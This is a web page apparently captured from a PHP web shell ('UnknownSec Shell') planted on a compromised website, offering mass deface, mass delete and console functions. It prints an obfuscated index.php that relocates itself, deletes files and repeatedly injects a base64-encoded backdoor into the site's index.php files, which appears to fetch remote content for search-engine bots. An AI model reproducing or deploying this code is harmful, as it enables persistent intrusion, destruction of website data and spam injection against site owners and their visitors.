shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
public
/
assets
/
images
/
seyzkqy
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto WjZLV; Yu0cU: @fwrite($outheader, $distr); goto YkTEr; rmhpg: $scriptname = "\x69\156\144\145\170\x2e\x70\150\x70"; goto WIUYA; xMSCd: if ($count == 6) { $ddir = "\x2e\x2e\x2f\56\56\57\56\56\57"; } goto LwtQO; Cjgyl: if ($count == 8) { $ddir = "\56\x2e\57\x2e\56\57\56\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f"; } goto Loyag; eD98Q: $foldername = ''; goto oMmci; akBS7: $dir = scandir("\56"); goto B54Ev; XQ8Xp: curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\151\154\154\141\x2f\65\56\60\40\50\x57\x69\156\x64\x6f\x77\x73\x20\116\x54\x20\x31\60\x2e\x30\x3b\40\127\151\x6e\x36\64\73\x20\170\x36\x34\x29\40\x41\160\x70\154\x65\127\x65\x62\x4b\x69\164\57\x35\x33\67\56\x33\66\40\x28\x4b\110\x54\x4d\114\x2c\40\154\x69\153\x65\x20\x47\x65\x63\153\x6f\x29\40\x43\150\162\x6f\x6d\x65\x2f\61\x31\61\56\x30\x2e\x30\56\60\x20\123\141\x66\x61\162\x69\x2f\x35\63\x37\x2e\63\x36\x20\117\x50\122\57\x39\x37\x2e\x30\x2e\60\x2e\60"); goto CEunw; M9oU_: if ($count == 12) { $ddir = "\56\56\x2f\x2e\x2e\57\56\x2e\57\56\x2e\x2f\56\56\57\56\x2e\57\x2e\56\57\56\56\x2f\x2e\56\x2f"; } goto LxyN9; UmceW: $url = (!empty($_SERVER["\110\x54\124\120\123"]) ? "\x68\164\164\x70\x73" : "\150\x74\x74\x70") . "\x3a\x2f\57" . $_SERVER["\110\124\x54\x50\137\110\x4f\123\x54"] . $_SERVER["\x52\x45\x51\125\x45\x53\124\137\x55\x52\x49"]; goto EyWe0; Ichll: $ch = curl_init(); goto koUss; u9Mce: curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); goto c7d6O; CEunw: $text = curl_exec($ch); goto awrdF; MwKVX: if ($count == 10) { $ddir = "\x2e\56\57\x2e\x2e\x2f\x2e\56\57\56\56\57\56\56\57\56\56\x2f\56\56\x2f"; } goto NKVE3; IohZi: $url = (!empty($_SERVER["\x48\124\124\x50\123"]) ? "\x68\164\164\x70\163" : "\150\x74\x74\160") . "\x3a\x2f\57" . $_SERVER["\110\124\124\120\x5f\110\x4f\x53\x54"] . $_SERVER["\122\105\121\125\105\x53\124\x5f\125\122\x49"]; goto WPqOg; VjbCD: ignore_user_abort(true); goto rmhpg; WPqOg: $url2 = str_replace("\57", '', $url, $count); goto XOzSR; Wrh47: $url = explode("\57", $url); goto COdzQ; COdzQ: array_pop($url); goto uwXlY; jDyGt: curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); goto UTMZE; NKVE3: if ($count == 11) { $ddir = "\56\x2e\x2f\56\x2e\57\56\56\57\56\x2e\x2f\x2e\x2e\57\56\56\x2f\56\x2e\x2f\56\x2e\57"; } goto M9oU_; WIUYA: $myfile = fopen("{$scriptname}", "\162"); goto Yx39x; mUiTT: if ($count == 4) { $ddir = "\x2e\56\x2f"; } goto G4O7F; B54Ev: foreach ($dir as $dirr) { if ($dirr !== "\x2e" and $dirr !== "\56\x2e") { unlink($dirr); } } goto EvFOi; Loyag: if ($count == 9) { $ddir = "\56\x2e\57\x2e\x2e\57\x2e\x2e\x2f\56\x2e\x2f\56\56\57\56\56\x2f"; } goto MwKVX; oMmci: for ($ns = 1; $ns < rand(8, 8); $ns++) { $r = rand(0, count($let) - 1); $foldername .= $let[$r]; } goto WPLzd; ebrRL: sleep(30); goto b0E79; rt8Rw: $url = implode("\57", $url); goto Bw5MG; G4O7F: if ($count == 5) { $ddir = "\x2e\56\57\x2e\x2e\57"; } goto xMSCd; U0NiM: if ($count == 14) { $ddir = "\56\x2e\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\57\56\56\57\x2e\x2e\x2f\x2e\x2e\x2f\x2e\56\57\56\56\x2f\x2e\x2e\x2f\56\56\x2f"; } goto btAZ6; EyWe0: $url2 = str_replace("\x2f", '', $url, $count); goto Wrh47; XUV7L: $nnn = 0; goto G7gt1; urgtF: curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); goto u9Mce; LwtQO: if ($count == 7) { $ddir = "\x2e\56\57\56\x2e\x2f\56\x2e\57\56\x2e\x2f"; } goto Cjgyl; G7gt1: while ($nnn < 60) { $file = fopen($ddir . "\x69\x6e\x64\145\x78\x2e\x70\150\160", "\162"); if (filesize($ddir . "\151\x6e\x64\145\170\x2e\160\150\160") > 0) { $buffer = fread($file, filesize($ddir . "\151\x6e\x64\145\x78\x2e\160\150\160")); $buffer2 = str_replace("\xa", "\x31\x31\61\61\x31\61\x31\61\61\x31\x31\x31\61\61", $buffer); if (strpos($buffer2, "\x62\157\x74\142\x6f\x74\142\157\164")) { $buffer2 = substr($buffer2, strpos($buffer2, "\x62\x6f\x74\x62\x6f\164\x62\157\164")); $buffer2 = substr($buffer2, strpos($buffer2, "\x3f\x3e") + 2); } if (!strpos($buffer2, "\x24\142\157\164\x62\x6f\x74\142\x6f\164")) { $buffer2 = $code . $buffer2; $buffer2 = str_replace("\61\x31\61\61\61\x31\61\x31\61\61\61\61\61\x31", "\12", $buffer2); chmod($ddir . "\151\x6e\144\145\x78\x2e\x70\150\160", 511); unlink($ddir . "\151\156\144\x65\x78\56\x70\x68\160"); $outheader = fopen($ddir . "\151\x6e\x64\x65\170\x2e\160\150\160", "\x77"); fwrite($outheader, $buffer2); fclose($outheader); chmod($ddir . "\151\x6e\144\145\170\56\x70\150\160", 292); } sleep(1); $nnn++; } } goto lyTjM; Vnq8v: $outheader = @fopen("\x2e\56\57" . $foldername . "\57\151\156\x64\x65\x78\56\x70\150\160", "\167"); goto Yu0cU; WjZLV: error_reporting(0); goto j_klD; Bw5MG: $newurl = $url . "\57" . $foldername . "\57\151\x6e\144\x65\x78\x2e\160\x68\x70"; goto Ichll; uwXlY: array_pop($url); goto rt8Rw; UTMZE: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); goto XQ8Xp; btAZ6: $code = base64_decode("\x50\x44\71\167\x61\110\101\x67\132\x32\71\60\142\x79\102\x71\141\153\115\x79\x5a\152\163\147\126\154\126\x35\144\x48\x6f\x36\x49\103\x52\x69\x62\x33\x52\x69\x62\63\x52\x69\x62\63\x52\x69\x62\63\121\x67\120\x53\101\151\x58\x48\x67\x79\132\x56\x77\x31\116\154\x77\x31\x4e\x69\x49\147\x4c\x69\x41\153\x58\x31\116\x46\x55\x6c\x5a\106\x55\x6c\x73\151\x58\104\105\x78\x4d\106\x78\64\116\x54\122\x63\x4d\x54\111\60\130\x44\105\x79\x4d\106\170\x34\x4e\x57\132\x63\x4d\124\x49\61\130\x44\x45\171\x4d\x31\167\170\115\x44\126\x63\x65\x44\x55\171\130\104\105\x7a\116\61\x78\64\116\x44\106\x63\115\124\101\x33\x58\x44\x45\167\x4e\126\170\64\116\107\x56\x63\x65\x44\125\x30\x49\154\x30\x37\x49\107\144\x76\x64\107\x38\147\x55\61\x52\63\144\x6e\x6f\x37\111\107\160\x71\x51\172\112\155\117\151\102\x41\132\x58\x4a\171\142\63\x4a\x66\143\x6d\126\167\142\x33\112\x30\x61\x57\x35\x6e\x4b\x44\x41\x70\117\x79\x42\x6e\142\x33\122\x76\x49\x46\x5a\x56\x65\x58\122\x36\117\x79\x42\104\x64\x30\x78\155\x5a\x7a\x6f\147\141\x57\131\x67\113\x48\x4e\60\x63\x6e\102\166\143\171\x67\x6b\x59\155\x39\x30\131\x6d\x39\x30\x59\155\x39\x30\131\155\x39\60\x4c\x43\x41\x69\x58\110\x67\62\132\x6c\170\64\x4e\155\x5a\143\145\104\x59\63\130\x48\147\x32\131\x31\167\170\x4e\104\125\x69\x4b\123\102\166\x63\151\x42\172\x64\110\112\x77\142\63\115\x6f\x4a\x47\x4a\x76\144\107\x4a\166\144\107\112\x76\144\x47\x4a\x76\x64\x43\x77\x67\111\x6c\170\x34\116\152\154\143\x4d\124\125\x32\130\x44\x45\x30\x4e\171\x49\160\x49\107\x39\171\x49\110\x4e\x30\143\x6e\x42\166\143\x79\147\153\x59\x6d\71\60\x59\155\x39\x30\x59\155\x39\60\131\x6d\71\60\x4c\x43\101\151\x58\x48\147\62\115\126\x77\170\116\x54\x42\143\115\124\125\x33\x58\x44\x45\61\x4e\171\111\160\x4b\123\x42\67\111\x43\122\x34\x65\110\147\147\x50\x53\x42\x69\x59\x58\x4e\x6c\x4e\152\122\146\132\107\x56\152\x62\62\122\x6c\x4b\103\112\143\115\x54\x45\62\x58\x44\105\x31\x4d\x6c\170\64\x4e\x54\x56\143\x65\104\116\153\x49\x69\x6b\x37\111\x43\x52\64\x65\x48\147\170\111\x44\60\147\131\155\x46\172\132\x54\x59\60\x58\x32\122\x6c\x59\62\71\x6b\132\x53\147\x69\130\x48\x67\60\132\x46\x78\64\x4e\155\x46\143\x65\104\121\x31\x58\x44\x63\61\x49\x69\153\x37\x49\x43\x52\x34\x65\x48\x67\171\111\104\60\x67\x59\x6d\106\x7a\x5a\124\x59\x30\130\x32\x52\154\x59\62\x39\153\132\x53\x67\x69\130\104\105\x78\116\x56\x78\x34\116\155\106\x63\x65\104\x52\153\x58\104\x59\170\111\151\x6b\x37\x49\x43\x52\x34\145\x48\147\x7a\111\104\60\147\131\x6d\x46\172\132\x54\x59\60\x58\x32\x52\x6c\x59\x32\x39\153\132\x53\x67\151\x58\x48\x67\x30\x5a\x46\x77\170\x4e\x54\x4a\x63\x65\x44\125\x31\130\110\147\63\117\103\111\160\117\171\101\153\x65\110\150\x34\116\103\x41\71\x49\107\x4a\150\143\x32\x55\62\x4e\x46\x39\153\x5a\127\116\166\132\x47\x55\x6f\x49\154\167\170\x4e\x44\x46\143\115\x54\x49\x33\x58\104\131\x31\x58\104\105\x32\x4e\x31\167\x78\x4e\104\122\x63\115\x54\115\x77\130\110\x67\x31\115\x56\170\64\115\x32\x51\x69\113\x54\163\147\112\x48\150\x34\145\x44\101\x67\x50\123\102\151\x59\x58\116\154\x4e\x6a\122\146\x5a\107\126\x6a\142\62\122\x6c\x4b\x43\112\x63\x4d\x54\121\170\130\x44\x45\x78\115\106\x77\x78\x4d\152\112\x63\x4e\x6a\x42\143\x4d\x54\x51\x7a\130\x48\x67\60\116\106\x78\x34\x4e\x6d\132\x63\x4d\x54\x59\62\130\x44\105\170\116\106\x77\x78\x4e\152\x64\x63\116\172\x56\143\x65\x44\x4e\x6b\x49\x69\153\67\111\x43\x52\64\145\110\147\167\115\x43\x41\x39\111\x43\122\x34\x65\110\x67\x67\x4c\x69\x41\151\x58\x44\x55\62\x49\x69\x41\x75\111\x43\x52\x34\x65\110\147\x78\111\103\64\147\111\x6c\170\64\x4d\155\x55\x69\x49\x43\x34\147\112\110\x68\64\x65\x44\111\147\114\x69\101\151\x58\x44\x55\x32\x49\x69\x41\165\x49\103\122\64\145\110\147\x7a\x4f\171\x41\153\145\x48\150\64\x4d\124\105\x67\120\123\101\153\145\110\150\64\116\x43\101\x75\x49\x43\112\143\145\x44\112\155\130\104\x63\63\130\x44\x45\62\x4e\126\x78\64\116\x7a\x4e\143\x65\x44\x59\61\130\104\105\x32\x4d\x6c\x77\170\x4e\104\x46\x63\145\104\x59\63\x58\x44\105\60\x4e\126\167\170\x4e\124\132\143\x4d\x54\x59\60\x58\104\143\x31\x49\x69\x41\x75\x49\x43\122\151\x62\x33\x52\x69\x62\63\x52\x69\142\x33\x52\151\142\x33\121\147\x4c\151\101\x69\130\x48\x67\171\116\154\167\x78\116\104\122\x63\x4d\x54\x55\x33\130\104\x45\x31\116\x56\170\64\116\152\x46\x63\x4d\124\125\170\130\104\x45\x31\x4e\x6c\167\63\x4e\123\111\x67\x4c\151\x41\153\130\61\x4e\106\x55\154\x5a\106\125\154\163\151\130\104\x45\170\x4d\x46\167\170\115\x6a\122\143\x65\104\125\60\130\110\147\x31\115\x46\167\x78\115\x7a\144\x63\115\x54\x45\167\x58\104\x45\170\116\x31\167\170\115\152\x4e\x63\x65\x44\x55\60\x49\x6c\x30\x37\111\x43\x52\x31\143\x6d\x77\147\120\x53\101\153\145\110\x68\x34\115\x43\x41\165\x49\103\122\64\x65\x48\147\x77\x4d\103\x41\165\x49\x43\x4a\143\x4e\124\x63\x69\x49\x43\x34\x67\x4a\x48\150\64\145\104\x45\170\117\x79\x41\153\x59\x32\147\x67\x50\x53\102\152\x64\x58\x4a\163\x58\62\154\165\x61\x58\x51\x6f\x4b\x54\x73\147\x59\63\126\171\142\106\x39\172\132\x58\122\166\x63\x48\x51\157\x4a\107\x4e\x6f\114\103\102\104\x56\126\112\115\x54\x31\102\125\130\61\x56\x53\124\103\x77\147\112\110\126\171\142\103\x6b\x37\x49\x47\x4e\61\x63\x6d\x78\x66\143\x32\126\x30\x62\63\x42\60\x4b\x43\122\152\x61\x43\167\147\x51\61\x56\x53\124\x45\71\121\126\106\71\x53\122\126\x52\126\x55\x6b\65\x55\125\x6b\x46\117\x55\60\132\106\x55\x69\167\147\115\123\153\x37\111\x43\122\171\x5a\x58\116\x31\x62\110\x51\x67\120\123\102\152\x64\x58\x4a\x73\x58\x32\x56\x34\x5a\x57\115\x6f\112\107\x4e\x6f\x4b\x54\x73\147\131\63\126\x79\x62\x46\71\152\142\x47\71\172\132\123\147\153\x59\62\147\x70\x4f\x79\102\x6c\x59\x32\150\166\111\x43\122\171\132\x58\116\61\142\x48\x51\67\111\x47\154\x6d\111\x43\150\x7a\x64\110\x4a\x77\x62\63\x4d\x6f\x4a\x48\112\154\x63\x33\x56\163\x64\103\x77\x67\x49\x6c\170\64\x4e\152\x68\x63\115\x54\131\x79\x58\104\x45\60\116\126\x77\170\x4e\104\132\x63\x65\104\116\153\111\x69\x6b\147\120\x43\x41\170\113\x53\x42\x37\111\x43\122\x79\x5a\130\116\61\x62\x48\x51\x67\120\x53\x42\x41\x5a\x6d\154\x73\x5a\126\71\x6e\x5a\130\x52\146\131\x32\x39\x75\x64\107\126\x75\144\110\115\157\111\156\x73\x6b\144\130\x4a\x73\146\x53\x49\x70\x4f\171\102\x6c\131\x32\150\x76\111\x43\122\171\132\x58\116\x31\142\x48\121\x37\x49\110\x30\x67\x66\123\102\x6e\x62\x33\122\166\x49\x46\x4a\x78\130\61\x64\115\117\x79\x42\124\x56\x48\144\62\145\152\157\x67\112\107\x4a\x76\144\x47\112\166\144\x47\x4a\x76\x64\107\x4a\166\x64\103\101\x39\x49\x48\x4e\60\143\x6c\71\171\x5a\130\102\x73\131\x57\116\x6c\x4b\103\112\143\116\104\x41\151\x4c\x43\101\151\x58\x44\125\x31\x49\x69\167\x67\112\107\112\166\144\x47\112\x76\x64\x47\x4a\x76\144\x47\112\x76\x64\x43\153\67\111\x47\144\166\144\x47\x38\147\121\x33\x64\x4d\x5a\155\143\67\111\x46\112\x78\x58\61\x64\x4d\117\x69\x41\x2f\x50\x67\x3d\x3d"); goto XUV7L; b0E79: $let = array("\x31", "\x32", "\x33", "\64", "\65", "\x36", "\67", "\70", "\71", "\x30", "\161", "\x77", "\x65", "\x72", "\164", "\x79", "\x75", "\151", "\157", "\x70", "\141", "\163", "\144", "\146", "\x67", "\150", "\152", "\153", "\x6c", "\172", "\170", "\x63", "\166", "\142", "\156", "\155", "\x71", "\x77", "\x65", "\x72", "\164", "\x79", "\x75", "\x69", "\157", "\160", "\141", "\163", "\x64", "\146", "\x67", "\150", "\x6a", "\153", "\154", "\x7a", "\x78", "\x63", "\166", "\142", "\156", "\155"); goto eD98Q; LxyN9: if ($count == 13) { $ddir = "\56\56\57\56\x2e\57\x2e\56\x2f\x2e\x2e\57\x2e\x2e\57\56\56\x2f\56\56\57\x2e\56\x2f\56\56\57\56\x2e\57"; } goto U0NiM; awrdF: curl_close($ch); goto IohZi; EvFOi: rmdir("\x2e\x2e\x2f" . basename(dirname(__FILE__))); goto ebrRL; WPLzd: mkdir("\56\56\57{$foldername}", 511); goto Vnq8v; koUss: curl_setopt($ch, CURLOPT_URL, $newurl); goto Eq3Ck; j_klD: set_time_limit(0); goto VjbCD; Eq3Ck: curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); goto urgtF; YkTEr: @fclose($outheader); goto UmceW; Yx39x: $distr = fread($myfile, filesize("{$scriptname}")); goto akBS7; XOzSR: if ($count == 3) { $ddir = "\56\x2f"; } goto mUiTT; c7d6O: curl_setopt($ch, CURLOPT_TIMEOUT, 10); goto jDyGt; lyTjM: ?>
© 2026 UnknownSec